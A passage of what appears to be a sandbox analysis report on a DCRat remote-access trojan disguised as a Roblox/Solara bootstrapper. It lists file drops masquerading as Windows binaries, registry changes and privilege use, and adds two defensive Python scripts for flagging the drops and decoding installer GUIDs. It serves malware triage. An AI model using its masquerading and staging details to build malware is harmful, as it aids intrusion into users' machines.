File created \??\c:\Windows\ServiceProfiles\LocalService\AppData\Local\CSC70844B7B29D341BB8FFEB0D5E4D717C1.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\Installer\MSIEE20.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\INF\CSCDBBF15C0A2E44A13B9B3BE52BA80BFB1.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\Installer\MSIA0F9.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\c82b8037eab33d C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB20C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57ab19.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Windows\Globalization\CSC2CD0480A80E4347B591AF5A63AD67F8.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\Installer\MSI9C06.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Globalization\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\e57ab15.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICB91.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEDF0.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9E1A.tmp C:\Windows\system32\msiexec.exe N/A
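
The rows above mix benign Windows Installer activity (msiexec.exe writing MSI*.tmp and e57ab1*.msi under C:\Windows\Installer) with the DCRat drops worth triaging: copies named after Windows system binaries (smss.exe, fontdrvhost.exe, unsecapp.exe, WaaSMedicAgent.exe, OfficeClickToRun.exe) placed in directories where those binaries never live, a 14-hex-character companion file next to each copy (29c1c3cc0f7685, 69ddcba757bf72, e6c9b481da804f, c82b8037eab33d), and csc.exe writing into C:\Windows, which indicates the payload compiles a stage at runtime. The script below, an added example for this report and not tooling from the sandbox or from the sample's author, runs those three checks over rows copied verbatim from the table. The expected-location baseline and the rule names are this editor's assumptions; csc.exe reports NT-style paths (\??\c:\...), which the parser folds to Win32 form before comparing.

```python
"""Flag DCRat-style drops in the 'Drops file in Windows directory' rows.

Added example for this report, not tooling from the sandbox or the sample's
author. SAMPLE_ROWS are copied verbatim from the table above; the three rules
and the EXPECTED_DIR baseline are this editor's assumptions.
"""
import re

# Rows copied from the table above (constructed sample input for the demo).
SAMPLE_ROWS = [
    r"File created C:\Windows\INF\29c1c3cc0f7685 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A",
    r"File opened for modification C:\Windows\Installer\MSIB093.tmp C:\Windows\system32\msiexec.exe N/A",
    r"File created \??\c:\Windows\INF\unsecapp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A",
    r"File created C:\Windows\Globalization\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A",
    r"File created C:\Windows\ImmersiveControlPanel\de-DE\fontdrvhost.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A",
    r"File created C:\Windows\BitLockerDiscoveryVolumeContents\OfficeClickToRun.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A",
    r"File created \??\c:\Windows\ServiceProfiles\LocalService\AppData\Local\CSC70844B7B29D341BB8FFEB0D5E4D717C1.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A",
    r"File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A",
]

# Report row layout: <description> <path> <process> <target>. Paths may contain
# spaces, so the process column is located by its drive-letter prefix.
ROW = re.compile(
    r"^(?P<desc>File created|File opened for modification)\s+"
    r"(?P<path>\S.*?)\s+(?P<proc>[A-Za-z]:\\\S.*?)\s+N/A$"
)

# Where these image names legitimately live on Windows 10 (editor's baseline,
# assumed; extend it from a clean reference host before using it for real).
EXPECTED_DIR = {
    "smss.exe": r"c:\windows\system32",
    "services.exe": r"c:\windows\system32",
    "fontdrvhost.exe": r"c:\windows\system32",
    "conhost.exe": r"c:\windows\system32",
    "unsecapp.exe": r"c:\windows\system32\wbem",
    "waasmedicagent.exe": r"c:\windows\system32",
    "officeclicktorun.exe": r"c:\program files\common files\microsoft shared\clicktorun",
}

# 14 lowercase hex chars: the companion file this run drops beside each copy.
HEX_COMPANION = re.compile(r"^[0-9a-f]{14}$")
NT_PREFIX = "\\??\\"


def normalize(path: str) -> str:
    """Fold the NT form csc.exe logs (\\??\\c:\\...) into plain Win32 form."""
    if path.startswith(NT_PREFIX):
        path = path[len(NT_PREFIX):]
    return path[:1].upper() + path[1:]


def analyze(rows):
    """Return (rule, path, process) triples for every rule a row trips."""
    findings = []
    for row in rows:
        m = ROW.match(row)
        if not m:
            continue
        path, proc = normalize(m["path"]), m["proc"]
        directory, name = (s.lower() for s in path.rpartition("\\")[::2])
        writer = proc.rpartition("\\")[2].lower()
        if name in EXPECTED_DIR and directory != EXPECTED_DIR[name]:
            findings.append(("system-binary-name-outside-expected-dir", path, proc))
        if HEX_COMPANION.match(name):
            findings.append(("hex-named-companion-file", path, proc))
        if writer == "csc.exe" and directory.startswith(r"c:\windows"):
            findings.append(("csc-writes-under-windows", path, proc))
    return findings


if __name__ == "__main__":
    for rule, path, proc in analyze(SAMPLE_ROWS):
        print(f"{rule:40} {path}  <- {proc}")
```

On the eight sample rows the msiexec.exe row is the only one that produces nothing; the unsecapp.exe row trips two rules at once (a system-binary name in C:\Windows\INF, written by csc.exe), which is the combination that most clearly separates this payload from ordinary installer noise.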

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5" C:\Windows\system32\LogonUI.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNode = "EnvironmentPath" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPath C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Version = "303038464" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductIcon = "C:\\Windows\\Installer\\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\\NodeIcon" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\corepack C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeRuntime C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeEtwSupport = "NodeRuntime" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNpmModules = "EnvironmentPath" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\npm C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductName = "Node.js" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\DocumentationShortcuts C:\Windows\system32\msiexec.exe N/A
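
The Installer\Products and Installer\UpgradeCodes rows above key everything by the 32-character packed form that Windows Installer uses for GUIDs (each of the first three GUID fields reversed, the last two byte-swapped). Unpacking 5B532AFE1A6C6E24B99C208A5DF6C1CD gives {EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}, the same product code that names the C:\Windows\Installer\{EFA235B5-...}\NodeIcon entries in the Windows-directory file table, so the two tables describe one Node.js install (node-v18.16.0-x64.msi) whose LastUsedSource is the bootstrapper's own Temp directory rather than a download location. The script below, an added example for this report and not sandbox or project code, implements that decoding and pulls the product, upgrade and package codes, product name, package name and source directory out of rows copied verbatim from the table.

```python
"""Decode the Windows Installer 'packed' GUIDs in the registry rows above.

Added example for this report, not sandbox or project code. SAMPLE_ROWS are
copied verbatim from the table; the decoding is the standard MSI packing
(first three GUID fields reversed, last two fields byte-swapped).
"""
import re

SAMPLE_ROWS = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD C:\Windows\system32\msiexec.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi" C:\Windows\system32\msiexec.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536" C:\Windows\system32\msiexec.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductName = "Node.js" C:\Windows\system32\msiexec.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A',
]

PRODUCT_VALUE = re.compile(r'\\Installer\\Products\\([0-9A-F]{32})\\(\S+) = "(.*)"')
UPGRADE_LINK = re.compile(r'\\Installer\\UpgradeCodes\\([0-9A-F]{32})\\([0-9A-F]{32})')


def _swap_pairs(s: str) -> str:
    """'9BC9' -> 'B99C': swap the two nibbles of every byte."""
    return "".join(s[i + 1] + s[i] for i in range(0, len(s), 2))


def unpack_guid(packed: str) -> str:
    """32 hex chars as stored under Installer\\ -> {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}."""
    p = packed.upper()
    if len(p) != 32 or any(c not in "0123456789ABCDEF" for c in p):
        raise ValueError(f"not a packed GUID: {packed!r}")
    parts = [p[:8][::-1], p[8:12][::-1], p[12:16][::-1],
             _swap_pairs(p[16:20]), _swap_pairs(p[20:])]
    return "{" + "-".join(parts) + "}"


def pack_guid(guid: str) -> str:
    """Inverse of unpack_guid; reversal and nibble swap are self-inverse."""
    a, b, c, d, e = guid.strip("{}").upper().split("-")
    return a[::-1] + b[::-1] + c[::-1] + _swap_pairs(d) + _swap_pairs(e)


def installer_summary(rows):
    """Collect what msiexec.exe registered, with every packed GUID decoded."""
    out = {}
    for row in rows:
        if m := UPGRADE_LINK.search(row):
            out["upgrade_code"] = unpack_guid(m[1])
            out["product_code"] = unpack_guid(m[2])
        elif m := PRODUCT_VALUE.search(row):
            out.setdefault("product_code", unpack_guid(m[1]))
            name = m[2].rpartition("\\")[2]
            out[name] = m[3]
            if name == "LastUsedSource":
                # "<type>;<index>;<path>", with backslashes doubled in the log
                out["source_dir"] = m[3].split(";")[-1].replace("\\\\", "\\")
            elif name == "PackageCode":
                out["package_code"] = unpack_guid(m[3])
    return out


if __name__ == "__main__":
    for key, value in installer_summary(SAMPLE_ROWS).items():
        print(f"{key:14} {value}")
```

The decoded product code is what to search for in the Installer directory, Uninstall keys and event logs of a host suspected of running this sample; the upgrade code {47C07A3A-42EF-4213-A85D-8F5A59077C28} is shared across versions of the same MSI product, so it survives a version bump where the product code does not.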

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
